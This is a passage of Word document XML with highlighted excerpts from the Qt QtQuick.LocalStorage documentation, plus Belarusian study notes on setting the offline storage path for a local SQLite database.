          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>singleton type for reading and writing to</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1658" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQLite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>databases</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">To use the types in this module, </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the module and call the relevant functions using the</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1659" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1660" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="typ"/>
            <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
            <w:color w:val="21BE2B"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</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onCompleted</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> db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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</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openDatabaseSync</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Fonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">These </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>databases are user-specific and QML-specific</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, but accessible to all QML applications. They are stored in the</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subdirectory of</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1661" w:anchor="offlineStoragePath-prop" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QQmlEngine::offlineStoragePath</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(), currently as</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1662" w:history="1">
        <w:r w:rsidRPr="0068181D">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>SQLite</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>databases.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Database connections are automatically closed during Javascript garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="008F1DE7" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="0068181D" w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Я скарыстаў наступную функцыю</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="00681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yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>engine.setOfflineStoragePath(</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"C:/Users/Roman/Desktop/Programming/qt/QtStudyProject/LocalStorage"</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>каб устанавіць шлях для лакальнай базы дадзен.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00875171" w:rsidRPr="00875171" w:rsidRDefault="00875171" w:rsidP="0068181D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Потым я выклікаў функцыю </w:t>
      </w:r>
      <w:r w:rsidRPr="00875171">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LocalStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="00875171">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00875171">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>openDatabaseSync</w:t>
      </w:r>
      <w:r w:rsidRPr="00875171">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>(...)</w:t>
      </w:r>
      <w:r w:rsidRPr="00875171">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> – і ў пазначанай мной дырэкторыі ўзнікла лакальная база дадзен.</w:t>
      </w:r>
      <w:r w:rsidR="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0068181D" w:rsidRPr="0068181D" w:rsidRDefault="0068181D" w:rsidP="0068181D">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68181D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The API can be used from JavaScript functions in your QML:</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.0</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="0068181D">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
